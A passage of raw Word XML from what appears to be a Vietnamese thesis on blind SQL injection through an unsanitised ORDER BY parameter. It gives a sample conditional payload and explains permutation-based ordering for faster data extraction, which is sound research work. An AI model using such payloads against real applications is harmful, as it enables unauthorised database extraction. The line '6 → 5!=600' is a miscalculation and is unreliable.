      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Mã nguồn chương trình</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="00DB4D2D" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>iến $sort từ người dùng được cộng trực tiếp vào sau mệnh đề ORDER BY. Như vậy, kẻ tấn công hoàn toàn có thể điều khiển được phần sau của câu truy vấn. Cần chú ý là mệnh đề ORDER BY dùng để sắp xếp, thao tác các dữ liệu đã có (ở phần trước của mệnh đề ORDER BY), chính vì thế không thể sử dụng kỹ thuật UNION để lấy thêm dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khai thác lỗ hổng SQL Injection trong truy vấn sử dụng mệnh đề Order By</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Không giống như khai thác lỗ hổng SQL injection truyền thống, phương pháp khai thác sử dụng UNION không sử dụng được trong trường hợp này (không thể sử dụng UNION sau ORDER BY). Chính vì thế, để khai thác lỗ hổng SQL injection trong trường hợp này cần sử dụng phương pháp Blind SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Trong tấn công khai thác lỗi Blind SQL injection, thông tin không được hiển thị trực quan trong dung nội trả về (thông qua thông báo lỗi, hay qua thông tin có thể thấy được tử CSDL), do đó kẻ tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>không</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy được dữ liệu được trích xuất từ CSDL. Thay vào đó, bằng cách sử dụng giá trị điều kiện trong truy vấn, từ đó dẫn đến sai khác trong nội dung trả về. Kẻ tấn công thực hiện phân tích kết quả trả về từ phản hồi trả lời đúng và trả lời sai để tìm ra sự khác biệt. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sư khác biệt đó có thể về checksum, cấu trúc HTML, từ khóa hoặc hành vi (Ví dụ như thời gian trả về).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bằng cách phân tích sự sai khác này, kẻ tấn công có thể trích xuất ra được dữ liệu mong muốn. Đi sâu vào phân tích cách sử dụng mệnh đề Order by, có thể thấy phía sau mệnh đề này có 03 dạng: col_name, expr, position. Nếu như col_name (Tên cột), hay position (số thứ tự) là một hằng số không thể can thiệp, thì việc cho phép expr (biểu thức) sẽ cho ta nhiều khả năng thực hiện tính toán sau mệnh đề ORDER BY. Trong trường hợp này, kẻ tấn công sẽ kết hợp sử dụng giá trị điều kiện và sắp xếp dữ liệu để làm sai lệch hiển thị của ứng dụng. Ví dụ để kiểm tra chữ cái đầu của giá trị tên database có phải là ký tự ‘A’ hay không, kẻ tấn công sẽ sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>?sort= if((substr(database(),1,1)='A'),id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Khi đó câu truy vấn được thực thi sẽ là:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>SELECT * FROM users ORDER BY if(substr(database,1,1)=’A’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Trong đó, đoạn substr(database,1,1)=’A’ là giá trị điều kiện kiểm tra xem chữ cái đầu của giá trị tên database có phải là ký tự ‘A’ hay không, nếu đúng sẽ trả về id (thực hiện sắp xếp theo cột id), nếu sai sẽ trả về point (thực hiện sắp xếp theo cột point). Trong ví dụ, tên database là: sql_orderby nên ký tự trả về sẽ là ‘s’:</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605E6A48" wp14:editId="212026AC">
            <wp:extent cx="4598290" cy="21526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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4601567" cy="2154184"/>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71" w:name="_Toc459819446"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Trường hợp đúng (‘s’ = ‘s’). Sắp xếp theo cột id.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>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69785824" wp14:editId="48DA5E1B">
            <wp:extent cx="4523434" cy="21431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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4539230" cy="2150609"/>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72" w:name="_Toc459819447"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> Trường hợp đúng (‘s’ != ‘A’). Sắp xếp theo cột point.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Trong ví dụ trên, nếu trường hợp đúng, dữ liệu sẽ trả về dòng có id là 1 lên trước dòng id là 2, nếu sai thì dữ liệu trả về dòng có id là 2 lên trước dòng id là 1. Bằng việc phân tích các dữ liệu trả về này, kẻ tấn công sẽ biết được tra chữ cái đầu của giá trị tên database có phải là ký tự ‘A’ hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc459822511"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Kỹ thuật tối ưu dựa trên tối ưu hóa nội dung trả về</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong quá trình nghiên cứu về tối ưu tấ</w:t>
      </w:r>
      <w:r w:rsidR="00B10C08">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n công Blind SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy rằng, mỗi yêu cầu gửi lên chỉ có thể có 2 hai khả năng trả về: Đúng hoặc sai. Do đó số lượng yêu cầu cần gửi đi luôn là số logarit cơ số 2 của số lượng phần tử tập ký tự cần kiểm tra. Các kỹ thuật tối ưu hóa thường đi theo hướng giới hạn tập ký tự cần kiểm tra, hoặc tối ưu hóa thuật toán tìm kiếm. Một hướng tiếp cận khác là làm thế nào đó trong một yêu cầu gửi đi có thể nhận về nhiều hơn 2 trạng thái trả về.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Khi khai thác lỗ hổng Blind SQL trong mệnh đề Order by ở trên, </w:t>
      </w:r>
      <w:r w:rsidR="00FB590B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đang sử dụng việc sắp xếp dữ liệu theo cột nào để nhận biết đúng/sai trong nội dung trả về. Như vậy, giả sử trong bảng dữ liệu trả về có 128 cột và việc sắp xếp theo 128 cột trả về 128 nội dung có thứ tự khác nhau thì hoàn toàn trong một yêu cầu có thể lấy về được một ký tự. Tất nhiên, trong thực tế việc một bảng có 128 cột, cũng như có thể đảm bảo 128 nội dung trả về có thứ tự khác nhau hoàn toàn là rất khó. Tuy nhiên, ý tưởng sắp xếp lại nội dung trả về dựa để có nhiều hơn số trạng thái trả về chính là ý tưởng chính cho nội dung tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Quá trình DBMS thực hiện lệnh ORDER BY có thể được mô tả đơn giản như sau: Sauk hi DMBS thực hiện câu lệnh truy vấn (đến hết mệnh đề WHERE), kết quả truy vấn này được đặt trong vào trong một “bảng”, hoặc “view”. Tiếp theo, đối với mỗi dòng (row) của kết quả, DBMS tiếp tục thực hiện biểu thức (expr) nằm trong mệnh đề ORDER BY. Kết quả của expr này sẽ được đặt trong một “cột” (column) ảo, hoặc một giá trị ảo của row đó. Cuối cùng, DMBS thực hiện sắp xếp thứ tự các row (tăng dần/giảm dần) theo thứ tự đó. Có thể thấy rằ</w:t>
      </w:r>
      <w:r w:rsidR="00FB590B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ng, khi</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực hiện ORDER BY id, thì một cột id’ ảo được sinh ra, giá trị của mỗi ô id` bằng ô id của hàng đó. DBMS sẽ căn cứ cột id’ để thực hiện thuật toán sắp xếp. Tương tự, khi thực hiện lệnh ORDER BY if(substr(database,1,1)=’A’,id,point) ở trên, DBMS sinh ra 1 cột ảo, tạm gọi là sort. Giá trị ô sort này bằng ô id của row đó nếu chữ cái đầu tiên của biến database là A, bằng ô point nếu chữ cái đó không phải là A.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nhận thấy rằng giá trị trả về đề sắp xếp (cột ảo được sinh ra) đang là chung cho tất cả các row. Giả sử, có cách nào đó để làm cho mỗi row này có giá trị ảo đó khác nhau, và giá trị này được điều khiển bởi ký tự cần lấy thì hoàn toàn có thể dùng cách sắp xếp để thực hiện trích xuất dữ liệu mà không cần dùng đến 128 cột như ý tưởng ở trên.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="00D71068" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc458409295"/>
      <w:bookmarkStart w:id="75" w:name="_Toc458409365"/>
      <w:bookmarkStart w:id="76" w:name="_Toc458433491"/>
      <w:bookmarkStart w:id="77" w:name="_Toc459373908"/>
      <w:bookmarkStart w:id="78" w:name="_Toc459373968"/>
      <w:bookmarkStart w:id="79" w:name="_Toc459374341"/>
      <w:bookmarkStart w:id="80" w:name="_Toc459822512"/>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidRPr="00D71068">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phương pháp sắp xếp và trích xuất dựa trên thứ tự trả về của dữ liệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở mục trên, tác giả đã trình bày về ý tưởng sắp xếp nội dung trả về theo kết quả của câu truy vấn. Ở phương pháp truyền thống: câu truy vấn chính là câu điều kiện, kết quả trả về đúng/sai. Nếu kết quả điều kiện đúng, trả về nội dung sắp xếp theo cột A, nếu kết quả điều kiện sai, trả về nội dung sắp xếp theo cột B. Ý tưởng mới đưa ra là làm cho cột ảo được sinh ra bởi biểu thức trong mệnh đề ORDER BY có giá trị khác nhau, tương ứng với ký tự cần lấy (hoặc một bit của ký tự cần lấy). Giả sử kết quả trả về n row, và các row này có giá trị id tăng liên tục (từ 1 đến n). Số cách sắp xếp không lặp là số hoán vị của số phần tử. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C590367" wp14:editId="7DE47F33">
            <wp:extent cx="1123950" cy="334010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Picture" descr=" P(n,r) = \frac{n!}{(n-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n,r) = \frac{n!}{(n-r)!} "/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1123950" cy="334010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với n là số phần tử, r là số ph</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ầ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n tử trong hoán vị. Vì n=r nên số hoán vị là n!.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu n=1, ta có 1 cách sắp xếp: 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=2, ta có 2 cách sắp xếp: 1 2 và 2 1 (quay lại cách khai thác truyền thống)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=3, ta có 3!=6 cách sắp xếp: 1 2 3, 1 3 2, 2 1 3, 2 3 1, 3 1 2, 3 2 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=4, ta có 4!=24 cách sắp xếp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=5, ta có 5!=120 cách sắp xếp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=6, ta có 5!=600 cách sắp xếp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ta chọn n=5 để chỉ lấy các ký tự nhìn thấy được. Với 120 cách sắp xếp, tương ứng với 120 ký tự có thể lấy được:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E730B8" w:rsidRPr="00E730B8" w:rsidRDefault="00E730B8" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc459803831"/>
      <w:r w:rsidRPr="00E730B8">
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00313D3F">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00E730B8">
        <w:t>: Các cách sắp xếp để hiển thị ký tự</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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0"/>
        <w:gridCol w:w="1745"/>
        <w:gridCol w:w="1496"/>
        <w:gridCol w:w="1579"/>
        <w:gridCol w:w="1496"/>
        <w:gridCol w:w="1662"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="005F5912">
        <w:trPr>
          <w:trHeight w:val="255"/>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3006E8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Giá trị char</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1 )</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5)</w:t>
            </w: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5F5912">
        <w:trPr>
          <w:trHeight w:val="39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5F5912">
        <w:trPr>
          <w:trHeight w:val="39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5F5912">
        <w:trPr>
          <w:trHeight w:val="39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5F5912">
        <w:trPr>
          <w:trHeight w:val="382"/>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0</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r>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Expr(id) là biểu thức trong mệnh đề ORDER BY, nhận đầu vào là số id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
